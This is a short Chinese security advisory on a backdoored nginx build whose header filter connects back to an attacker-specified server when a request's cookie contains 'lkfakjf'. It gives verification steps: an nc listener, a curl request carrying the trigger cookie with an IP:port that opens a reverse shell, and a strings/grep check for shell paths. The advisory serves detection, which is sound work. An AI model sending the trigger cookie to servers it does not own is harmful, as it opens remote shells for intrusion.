一、综述
近日,有安全厂商发布文章表示捕获到一款新型 nginx 后门,其免杀效果非常好,截至文章发布之时 VT 上的全部杀软都未能检测。
据分析,这款带后门的 nginx 修改了原版nginx中处理http头的函数ngx_http_header_filter,后门构造者对cookies字段进行了特殊处理,一旦请求中包含“lkfakjf”字符串,就会主动回连攻击者指定的服务器地址。
参考链接:
https://ti.dbappsecurity.com.cn/informationDetail?id=947
二、验证
2.1 网络验证
通过nc在本地监听9999端口:
$ nc -lv 9999使用curl带上特殊cookie对本地地址发起请求:
$ curl "127.0.0.1" -H "Cookie:lkfakjfa0.0.0.0:9999"如果在监听端口得到shell,说明本服务器的nginx已经被恶意替换。
2.2 本地验证
在 nginx 进程的绝对路径下执行如下命令,观察是否有输出,如有输出则说明存在异常:
strings nginx |grep -E '/bin/sh|/bin/ash|/bin/tcsh|/bin/ksh|/bin/zsh|/bin/csh|/bin/bash'三、安全建议
从第三方平台下载并使用 Nginx 的用户建议尽快采用以上验证方法排查自身环境中的程序是否安全,如有异常,建议马上卸载,并对环境进行查杀。
尽可能确保所用软件来自官网,尽量避免从无法验证可靠性的第三方应用市场或其他渠道下载软件。